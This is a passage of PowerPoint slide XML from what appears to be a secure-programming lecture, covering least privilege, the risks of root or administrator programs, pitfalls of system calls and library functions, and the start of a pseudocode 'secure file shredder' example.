              <a:t>preferred </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safer, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sufficient</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ensure can only modify files/dirs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>needed</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>otherwise compromise results in greater</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>damage</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>recheck </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>these when </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>moved or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>upgraded</a:t>
            </a:r>
            <a:endParaRPr sz="24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36</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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027679" y="1006855"/>
            <a:ext cx="4003040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Root/Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069339" y="2077465"/>
            <a:ext cx="7701280" cy="4457700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="196215" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Programs with root / administrator privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a  major </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of attackers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since provide </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>highest levels of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are needed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>manage access to protected system  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resources, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>network server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ports</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Often privilege only needed at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>start</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can then run as normal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="527685" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Good </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>design partitions complex programs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in  smaller modules with needed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>privileges</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37</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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841009" y="794258"/>
            <a:ext cx="4378325" cy="1000760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="794385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0"/>
              <a:t>System Calls and  Standard Library</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0"/>
              <a:t>Functions</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2001265"/>
            <a:ext cx="7526020" cy="3343275"/>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3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Programs use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>system </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>calls and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>standard </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>library  functions for common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>operations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and make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assumptions about their</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>operation</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="454659" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>incorrect behavior may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>result of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>system  optimizing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffering, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>re-sequencing, modifying</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>can conflict </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>with program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>goals</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14604" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="101600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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140455" y="1006855"/>
            <a:ext cx="3776345" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Secure File</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shredder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918702" y="2580624"/>
            <a:ext cx="8300084" cy="1534795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="26448">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="67945" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1610"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, …</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="5939790">
              <a:lnSpc>
                <a:spcPts val="1550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>open file for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>writing  for each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>pattern</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="423545">
              <a:lnSpc>
                <a:spcPts val="1445"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>seek to start of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="4011929" indent="320675">
              <a:lnSpc>
                <a:spcPts val="1550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>overwrite file contents with pattern  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>close file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1510"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
